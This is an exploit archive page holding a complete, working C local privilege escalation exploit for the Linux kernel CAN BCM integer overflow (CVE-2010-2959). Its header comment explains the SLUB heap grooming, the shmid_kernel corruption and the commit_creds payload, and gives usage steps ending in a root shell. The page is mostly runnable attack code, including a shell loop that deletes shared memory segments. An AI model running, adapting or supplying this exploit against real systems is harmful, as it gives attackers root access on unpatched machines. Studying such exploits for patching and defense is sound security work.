what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux Kernel CAN BCM Privilege Escalation Exploit

Linux Kernel CAN BCM Privilege Escalation Exploit
Posted Aug 28, 2010
Authored by Jon Oberheide

Linux Kernel versions prior to 2.6.36-rc1 CAN BCM privilege escalation exploit.

tags | exploit, kernel
systems | linux
advisories | CVE-2010-2959
SHA-256 | 72e086a014a41a623ca930856f57c9a2e1ea6f163b29e800d67473f6e614b2f1

Linux Kernel CAN BCM Privilege Escalation Exploit

Change Mirror Download
/*
* i-CAN-haz-MODHARDEN.c
*
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
*
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
*
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* The allocation pattern of the CAN BCM module gives us some desirable
* properties for smashing the SLUB. We control the kmalloc with a 16-byte
* granularity allowing us to place our allocation in the SLUB cache of our
* choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
* old-times sake). The allocation can also be made in its own discrete
* stage before the overwrite which allows us to be a bit more conservative
* in ensuring the proper layout of our SLUB cache.
*
* To exploit the vulnerability, we first create a BCM RX op with a crafted
* nframes to trigger the integer overflow during the kmalloc. On the second
* call to update the existing RX op, we bypass the E2BIG check since the
* stored nframes in the op is large, yet has an insufficiently sized
* allocation associated with it. We then have a controlled write into the
* adjacent shmid_kernel object in the 96-byte SLUB cache.
*
* However, while we control the length of the SLUB overwrite via a
* memcpy_fromiovec operation, there exists a memset operation that directly
* follows which zeros out last_frames, likely an adjacent allocation, with
* the same malformed length, effectively nullifying our shmid smash. To
* work around this, we take advantage of the fact that copy_from_user can
* perform partial writes on x86 and trigger an EFAULT by setting up a
* truncated memory mapping as the source for the memcpy_fromiovec operation,
* allowing us to smash the necessary amount of memory and then pop out and
* return early before the memset operation occurs.
*
* We then perform a dry-run and detect the shmid smash via an EIDRM errno
* from shmat() caused by an invalid ipc_perm sequence number. Once we're
* sure we have a shmid_kernel under our control we re-smash it with the
* malformed version and redirect control flow to our credential modifying
* calls mapped in user space.
*
* Distros: please use grsecurity's MODHARDEN or SELinux's module_request
* to restrict unprivileged loading of uncommon packet families. Allowing
* the loading of poorly-written PF modules just adds a non-trivial and
* unnecessary attack surface to the kernel.
*
* Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
* easily to other vulnerable kernels/distros. Careful, it could use some
* post-exploitation stability love as well.
*
* Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
* this exploit borrows code from.
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif

#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct { uint32_t rx_id, tx_id; } tp;
} can_addr;
};

struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};

struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};

#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
struct list_head *next;
struct list_head *prev;
};

struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;

struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};

struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;

struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;

struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;

struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;

struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;

struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};

struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
int ret = 0, oldstyle;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
return 0;
oldstyle = 1;
}

while (ret != EOF) {
if (!oldstyle) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
} else {
ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
continue;
}
p = strrchr(sname, '_');
if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_') {
p--;
}
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);

return 0;
}

int
check_slabinfo(char *cache, int *active_out, int *total_out)
{
FILE *fp;
char name[64], slab[256];
int active, total, diff;

memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));

fp = fopen("/proc/slabinfo", "r");
if (!fp) {
printf("[-] sorry, /proc/slabinfo is not available!");
exit(1);
}

fgets(slab, sizeof(slab) - 1, fp);
while (1) {
fgets(slab, sizeof(slab) - 1, fp);
sscanf(slab, "%s %u %u", name, &active, &total);
diff = total - active;
if (strcmp(name, cache) == 0) {
break;
}
}
fclose(fp);

if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

void
trigger(void)
{
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;

printf("[+] creating PF_CAN socket...\n");

sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf("[-] kernel lacks CAN packet family support\n");
exit(1);
}

printf("[+] connecting PF_CAN socket...\n");

memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) {
printf("[-] could not connect CAN socket\n");
exit(1);
}

len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
msg = malloc(len);
memset(msg, 0, len);
msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

printf("[+] clearing out any active OPs via RX_DELETE...\n");

msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);

printf("[+] removing any active user-owned shmids...\n");

system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");

diff = check_slabinfo(SLUB, &active, &total);

shmids = malloc(sizeof(int) * diff * 10);

cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;

if (diff != 0) {
printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");
exit(1);
}

printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");

i = base;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}

msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf("[-] kernel rejected malformed CAN header\n");
exit(1);
}

i = base + FILLER;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}

printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");

mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");

msg = (struct bcm_msg_head *) efault;
memset(msg, 0, mmap_len);
msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;

msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
exit(1);
}

printf("[+] seeking out the smashed shmid_kernel...\n");

i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) {
ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
if (ret == -1 && errno == EIDRM) {
smashed = i;
break;
}
}
if (i == cnt) {
printf("[-] could not find smashed shmid, trying running the exploit again!\n");
exit(1);
}

printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

printf("[+] re-smashing the shmid_kernel with exploit payload...\n");

shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;

buf = (char *) msg;
memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
exit(1);
}

ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {
setresuid(0, 0, 0);
setresgid(0, 0, 0);

printf("[+] launching root shell!\n");

execl("/bin/bash", "/bin/bash", NULL);
exit(0);
}

printf("[-] exploit failed! retry?\n");
}

void
setup(void)
{
printf("[+] looking for symbols...\n");

commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] symbol table not availabe, aborting!\n");
}

prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] symbol table not availabe, aborting!\n");
}

printf("[+] setting up exploit payload...\n");

super_block.s_flags = 0;

inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;

dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;

op.mmap = &kernel_code;
op.get_unmapped_area = &kernel_code;

vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;

file.fu_list.prev = &file.fu_list;
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;

shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;
shmid_kernel.shm_file = &file;
}

int
main(int argc, char **argv)
{
setup();
trigger();
return 0;
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close